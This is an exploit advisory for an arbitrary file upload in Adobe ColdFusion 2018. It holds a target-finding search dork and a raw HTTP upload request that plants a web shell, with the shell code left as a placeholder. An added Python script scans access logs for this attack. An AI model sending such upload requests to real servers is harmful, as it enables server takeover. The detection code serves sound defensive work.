[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload
# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion have been elevated to Priority due to a report that CVE-- is now being actively exploited.

```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests:

-----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg

%shell code here%
-----------------------------
Content-Disposition: form-data; name="path"

shell
-------------------------------
```

A shell will be located here: http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
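For defenders, the two paths in the request above are the log indicators to hunt for. The following is an added example, not part of the original advisory: it scans web access logs for POSTs to the upload endpoint and for requests into the `uploadedFiles` folder. The combined log format, the function names, the extension list and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the request shown above, lower-cased for case-insensitive matching.
FM_DIR = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
UPLOAD = FM_DIR + "upload.cfm"
DROP_DIR = FM_DIR + "uploadedfiles/"
# Assumption: extensions the application server would execute rather than serve.
EXEC_EXT = (".cfm", ".cfml", ".cfc", ".jsp", ".jspx")
# Assumption: combined log format, ip - - [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalise(target):
    """Drop the query string, percent-decode, lower-case and collapse // runs."""
    return re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]).lower())

def scan(lines):
    """Return (ip, rule, path) findings for the upload endpoint and drop folder."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, method, target, status = m.groups()
        path = normalise(target)
        if path == UPLOAD and method == "POST":
            uploaders.add(ip)
            findings.append((ip, "upload-post", path))
        elif path.startswith(DROP_DIR):
            if ip in uploaders and status == "200":
                rule = "fetch-after-upload"   # same client uploaded, then retrieved
            elif path.endswith(EXEC_EXT):
                rule = "script-in-drop-dir"   # server-executed file type requested
            else:
                rule = "drop-dir-access"
            findings.append((ip, rule, path))
    return findings

# Constructed sample log lines (documentation addresses, not from a real server).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2000:10:00:00 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.7 - - [01/Jan/2000:10:00:05 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file HTTP/1.1" 200 5 "-" "-"',
    '198.51.100.9 - - [01/Jan/2000:10:01:00 +0000] "GET /CF_SCRIPTS/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/a%2Ecfm HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.4 - - [01/Jan/2000:10:02:00 +0000] "GET /index.cfm HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```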